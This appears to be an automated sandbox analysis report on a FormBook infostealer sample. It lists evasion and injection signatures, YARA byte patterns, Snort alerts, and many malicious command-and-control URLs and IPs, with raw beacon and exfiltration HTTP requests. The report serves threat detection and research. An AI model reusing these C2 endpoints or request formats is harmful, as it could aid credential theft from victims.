Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
P5348574_74676.exe

Overview

General Information

Sample Name:P5348574_74676.exe
Analysis ID:875301
MD5:a18c297a0e296e70ff0b3f159ec31b2d
SHA1:c435a2f58d54fd26b0bc61a348f4e754f54098db
SHA256:cfc12adfab410acd8090691e1b66fb468e033c5c5a5de350016b3cf133be27a8
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • P5348574_74676.exe (PID: 6908 cmdline: C:\Users\user\Desktop\P5348574_74676.exe MD5: A18C297A0E296E70FF0B3F159EC31B2D)
    • P5348574_74676.exe (PID: 6996 cmdline: C:\Users\user\Desktop\P5348574_74676.exe MD5: A18C297A0E296E70FF0B3F159EC31B2D)
      • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • WWAHost.exe (PID: 3788 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.813282627.0000000003460000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.813282627.0000000003460000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000004.00000002.813282627.0000000003460000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x180b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x181b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1832f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa9fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16d9c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ed9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.813198167.0000000002FA0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.813198167.0000000002FA0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x182b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.P5348574_74676.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        2.2.P5348574_74676.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x1fff3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbde2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1926a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.2.P5348574_74676.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19068:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18b04:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1916a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x192e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb9ad:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17d4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1ed9a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fd4d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.P5348574_74676.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.P5348574_74676.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20df3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcbe2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.4185.134.245.11349721802031453 05/25/23-11:37:55.686481
          SID:2031453
          Source Port:49721
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4185.134.245.11349721802031412 05/25/23-11:37:55.686481
          SID:2031412
          Source Port:49721
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4130.185.109.7749694802031453 05/25/23-11:36:08.654387
          SID:2031453
          Source Port:49694
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4185.134.245.11349721802031449 05/25/23-11:37:55.686481
          SID:2031449
          Source Port:49721
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4130.185.109.7749694802031449 05/25/23-11:36:08.654387
          SID:2031449
          Source Port:49694
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4185.134.245.11349719802829004 05/25/23-11:37:41.140798
          SID:2829004
          Source Port:49719
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4130.185.109.7749694802031412 05/25/23-11:36:08.654387
          SID:2031412
          Source Port:49694
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: P5348574_74676.exeReversingLabs: Detection: 58%
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.P5348574_74676.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.P5348574_74676.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.813282627.0000000003460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.813198167.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.813519537.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.578578399.0000000001760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus / Scanner detection for submitted sample
          Source: P5348574_74676.exeAvira: detected
          Antivirus detection for URL or domain
          Source: http://www.jhg61.com/bpg5/www.jhg61.comUZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.rt66omm.com/bpg5/www.rt66omm.comUZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.haynicorpon.biz/bpg5/?lpw7=E1lEyZmRnD2D+FehgZ3adwfuD0V+JGYoymMHnSTWmThHM+xhQcv29ZH2HKfEtfNOP/hjUin7/rBu/LxtAOfOYIovOzsEyI2Bzg==&UZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.thetowerbells.com/bpg5/www.thetowerbells.comUZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.vns96.net/bpg5/www.vns96.netUZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.jhg61.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.techwithsun.com/bpg5/www.techwithsun.comAvira URL Cloud: Label: malware
          Source: http://www.thetowerbells.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.haynicorpon.bizAvira URL Cloud: Label: malware
          Source: http://www.mysparexrewards.comAvira URL Cloud: Label: malware
          Source: http://www.techwithsun.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.techwithsun.comAvira URL Cloud: Label: malware
          Source: http://www.wearecatalyst.app/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.vns96.net/bpg5/?lpw7=fXcMbGDjExj3drMKkufBQsBzHfQKFTmLB4JM93eT0riZ5SFz+kUtiUeQeK0rTvuj3gbHhqJGCt4vmHgIT135jm/4dwFi2a8Vxg==&UZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.jhg61.com/bpg5/?lpw7=pOb1wbOKbC6m5caeF5Aq0gkUNx4nmyAvira URL Cloud: Label: malware
          Source: http://www.antalyabfe.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.fabricadepack.fun/bpg5/www.fabricadepack.funUZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.gomarketing.infoAvira URL Cloud: Label: malware
          Source: http://www.rt66omm.com/bpg5/?lpw7=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuhfKJOii3EjlU32Tg==&UZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.haynicorpon.biz/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.gomarketing.info/bpg5/www.gomarketing.infoUZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.vns96.net/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.gomarketing.info/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.gomarketing.info/bpg5/?lpw7=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCPUstET1IBoTg95Q==&UZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.mysparexrewards.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.musicandgros.comAvira URL Cloud: Label: malware
          Source: http://www.berlinhealthweek.com/bpg5/Avira URL Cloud: Label: malware
          Source: https://www.antalyabfe.com/bpg5/?lpw7=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3Avira URL Cloud: Label: malware
          Source: http://www.fabricadepack.fun/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.berlinhealthweek.com/bpg5/?lpw7=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==&UZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.berlinhealthweek.com/bpg5/www.berlinhealthweek.comUZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.wearecatalyst.app/bpg5/www.wearecatalyst.appUZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.musicandgros.com/bpg5/?lpw7=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwTEx2mn7HsaAaANg==&UZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.thetowerbells.com/bpg5/?lpw7=Xv/upeh51eH8JUjKDjNCkuTcNeiL8VtsCg7ztHvoG96mJwKh62aGaGa8UVClz5xrnRG3Z5NRq8txS1i3c96fEoalz7dwQDKkbQ==&UZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.rt66omm.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.musicandgros.com/bpg5/www.musicandgros.comUZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.42230.orgAvira URL Cloud: Label: malware
          Source: http://www.berlinhealthweek.comAvira URL Cloud: Label: malware
          Source: http://www.mysparexrewards.com/bpg5/www.mysparexrewards.comUZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.haynicorpon.biz/bpg5/www.haynicorpon.bizUZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.42230.org/bpg5/www.42230.orgUZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.42230.org/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.antalyabfe.com/bpg5/www.antalyabfe.comUZCu=zJfEuRXw-PAvira URL Cloud: Label: malware
          Source: http://www.thetowerbells.com/bpg5/www.thetowerbells.comAvira URL Cloud: Label: malware
          Source: http://rt66omm.com/bpg5/?lpw7=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVfAvira URL Cloud: Label: malware
          Source: http://www.musicandgros.com/bpg5/Avira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: P5348574_74676.exeJoe Sandbox ML: detected
          Source: P5348574_74676.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: P5348574_74676.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000003.00000002.833142897.00007FF883751000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000003.00000002.833142897.00007FF883751000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: cqdO.pdbSHA256 source: P5348574_74676.exe
          Source: Binary string: WWAHost.pdb source: P5348574_74676.exe, 00000002.00000003.576954904.0000000003532000.00000004.00000020.00020000.00000000.sdmp, P5348574_74676.exe, 00000002.00000003.576480706.000000000345D000.00000004.00000020.00020000.00000000.sdmp, P5348574_74676.exe, 00000002.00000002.582877964.0000000003450000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.812879939.0000000000D90000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: P5348574_74676.exe, 00000002.00000003.576954904.0000000003532000.00000004.00000020.00020000.00000000.sdmp, P5348574_74676.exe, 00000002.00000003.576480706.000000000345D000.00000004.00000020.00020000.00000000.sdmp, P5348574_74676.exe, 00000002.00000002.582877964.0000000003450000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.812879939.0000000000D90000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: P5348574_74676.exe, 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, P5348574_74676.exe, 00000002.00000003.550716318.0000000001459000.00000004.00000020.00020000.00000000.sdmp, P5348574_74676.exe, 00000002.00000003.552036455.00000000015F1000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.815352919.0000000003FB0000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.815352919.00000000040CF000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.582987666.0000000003E15000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.578620427.0000000003C78000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cqdO.pdb source: P5348574_74676.exe
          Source: Binary string: wntdll.pdb source: P5348574_74676.exe, P5348574_74676.exe, 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, P5348574_74676.exe, 00000002.00000003.550716318.0000000001459000.00000004.00000020.00020000.00000000.sdmp, P5348574_74676.exe, 00000002.00000003.552036455.00000000015F1000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.815352919.0000000003FB0000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.815352919.00000000040CF000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.582987666.0000000003E15000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.578620427.0000000003C78000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: eex.pdb source: explorer.exe, 00000003.00000002.833142897.00007FF883751000.00000020.00000001.01000000.0000000A.sdmp
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 4x nop then jmp 08387A95h1_2_08386EC8

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 130.185.109.77 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.thetowerbells.com
          Source: C:\Windows\explorer.exeDomain query: www.berlinhealthweek.com
          Source: C:\Windows\explorer.exeDomain query: www.gomarketing.info
          Source: C:\Windows\explorer.exeDomain query: www.antalyabfe.com
          Source: C:\Windows\explorer.exeDomain query: www.rt66omm.com
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.93 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.7 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.177.124.57 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.musicandgros.com
          Source: C:\Windows\explorer.exeDomain query: www.vns96.net
          Source: C:\Windows\explorer.exeNetwork Connect: 185.134.245.113 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 118.27.125.172 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.194.229.198 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.jhg61.com
          Source: C:\Windows\explorer.exeNetwork Connect: 183.90.228.46 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 150.129.40.9 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.haynicorpon.biz
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49694 -> 130.185.109.77:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49694 -> 130.185.109.77:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49694 -> 130.185.109.77:80
          Source: TrafficSnort IDS: 2829004 ETPRO TROJAN FormBook CnC Checkin (POST) 192.168.2.4:49719 -> 185.134.245.113:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49721 -> 185.134.245.113:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49721 -> 185.134.245.113:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49721 -> 185.134.245.113:80
          Source: Joe Sandbox ViewASN Name: XIRRADE XIRRADE
          Source: global trafficHTTP traffic detected: GET /bpg5/?lpw7=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==&UZCu=zJfEuRXw-P HTTP/1.1Host: www.berlinhealthweek.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?lpw7=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwTEx2mn7HsaAaANg==&UZCu=zJfEuRXw-P HTTP/1.1Host: www.musicandgros.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?lpw7=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCPUstET1IBoTg95Q==&UZCu=zJfEuRXw-P HTTP/1.1Host: www.gomarketing.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?lpw7=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8XP3QjR+DEcO6R3g==&UZCu=zJfEuRXw-P HTTP/1.1Host: www.antalyabfe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?lpw7=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuhfKJOii3EjlU32Tg==&UZCu=zJfEuRXw-P HTTP/1.1Host: www.rt66omm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?lpw7=E1lEyZmRnD2D+FehgZ3adwfuD0V+JGYoymMHnSTWmThHM+xhQcv29ZH2HKfEtfNOP/hjUin7/rBu/LxtAOfOYIovOzsEyI2Bzg==&UZCu=zJfEuRXw-P HTTP/1.1Host: www.haynicorpon.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?lpw7=fXcMbGDjExj3drMKkufBQsBzHfQKFTmLB4JM93eT0riZ5SFz+kUtiUeQeK0rTvuj3gbHhqJGCt4vmHgIT135jm/4dwFi2a8Vxg==&UZCu=zJfEuRXw-P HTTP/1.1Host: www.vns96.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?lpw7=Xv/upeh51eH8JUjKDjNCkuTcNeiL8VtsCg7ztHvoG96mJwKh62aGaGa8UVClz5xrnRG3Z5NRq8txS1i3c96fEoalz7dwQDKkbQ==&UZCu=zJfEuRXw-P HTTP/1.1Host: www.thetowerbells.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 130.185.109.77 130.185.109.77
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.musicandgros.comConnection: closeContent-Length: 1482Cache-Control: no-cacheOrigin: http://www.musicandgros.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.musicandgros.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 70 77 37 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 44 6d 6a 63 53 66 41 63 67 6e 32 66 71 36 44 6c 65 33 4f 74 7a 50 52 32 51 79 54 78 32 6f 72 32 35 62 70 30 43 59 42 35 72 53 5a 46 4e 68 65 6a 31 4a 6f 70 55 7a 30 56 76 6e 31 79 45 32 7a 67 4d 52 69 56 67 59 4c 42 46 53 6c 71 37 28 71 65 77 37 6b 50 6d 5a 52 32 51 35 39 7e 37 62 6f 58 79 62 78 4c 54 35 52 4c 37 72 4c 4d 56 6b 55 39 38 4e 4d 45 59 4a 36 7a 39 50 6f 67 57 38 54 55 50 72 47 70 6b 38 30 72 30 68 35 4e 54 46 4b 53 42 44 65 77 56 70 2d 7a 6b 62 75 34 6d 52 75 48 58 6f 42 61 74 41 6c 30 70 70 4d 50 33 30 42 32 5a 33 45 72 77 57 6d 6d 32 41 39 54 30 41 2d 7e 70 6a 53 55 68 28 4a 58 4c 4a 2d 62 54 4b 57 6a 43 4e 45 4c 78 7e 6b 6a 57 69 6b 45 64 6c 41 72 39 76 67 61 69 41 6e 45 30 59 70 68 45 65 72 58 70 32 6c 58 64 77 35 45 45 4e 53 4e 68 72 31 59 4c 74 6d 73 56 79 37 70 54 6f 59 56 34 37 42 38 67 31 53 45 32 6b 42 6c 4c 37 54 44 79 6b 44 74 4b 46 36 61 44 79 6e 69 6a 66 53 39 38 35 31 43 7a 75 72 70 6b 79 6f 39 39 36 65 76 64 78 79 65 4a 37 58 35 4f 41 53 6a 5f 34 6e 4c 6c 35 45 55 62 63 76 47 32 44 4b 4e 48 7e 43 38 76 35 4f 52 36 74 58 30 42 30 79 63 4b 44 57 6b 4a 41 4c 71 77 50 57 6e 31 67 44 44 65 67 2d 76 53 67 4f 65 55 28 41 4b 67 42 56 4b 48 70 4f 64 5f 38 41 28 4f 56 6c 65 56 41 76 6e 32 33 30 54 4f 30 6c 52 51 6c 37 69 76 37 61 6e 36 35 79 6d 68 77 64 70 72 39 33 51 4e 33 34 32 75 54 39 37 50 50 5f 7e 41 53 33 57 73 4d 57 54 39 55 6c 52 75 6b 58 49 45 6a 4c 7e 57 73 49 68 73 43 51 4f 47 45 54 78 71 6c 44 4f 69 50 79 4c 37 64 32 4d 67 79 43 7a 5a 44 38 4a 39 63 76 68 36 73 65 36 42 74 6f 51 46 44 76 74 57 4b 73 74 74 33 78 39 38 49 58 49 35 59 36 45 51 79 47 72 33 61 65 42 64 41 6d 50 78 74 62 30 70 6c 4a 4d 4b 56 73 71 6c 61 42 75 6c 30 2d 73 47 54 33 79 2d 49 34 67 6c 79 6f 67 75 71 4f 34 54 6d 4f 42 48 66 4f 63 72 46 76 39 68 6d 31 71 30 39 78 4a 67 28 64 35 38 45 67 4d 62 61 37 4a 4f 71 6b 61 6c 74 72 43 42 78 59 42 4a 46 58 32 4d 65 67 4c 70 38 73 31 77 52 4e 28 4e 6c 53 71 44 39 63 6f 79 46 6b 47 33 37 33 55 52 4f 74 46 4d 4d 66 6d 4f 34 38 32 72 4a 76 68 6d 70 56 7e 66 50 71 7a 35 53 78 55 71 56 51 63 63 51 51 56 34 41 54 55 7a 62 62 4b 4a 6e 6b 4a 2d 77 59 7e 6e 68 49 32 2d 56 4b 49 61 50 30 48 4c 46 6b 36 6b 38 5a 48 4d 52 31 28 46 44 4e 38 37 6b 47 71 35 45 52 76 69 78 2d 6c 6d 50 6c 65 45 4c 7a 78 67 58 7a 7a 79 70 6a 43 68 72 46 53 68 49 38 70 30 4f 51 38 34 76 62 31 42 43 64 54 31 57 58 33 51 46 62 73 6a 51 63 4d 73 7a 73 73 4f 70 75 68 61 72 5f 4c 51 5a 44 68 76 50 54 51 75 70 4c 6f 6b 72 39 50 47 6e 58 56 63 65 75 34 48 7e 66 41 52 4f 6c 32 71 6e 76 31 5
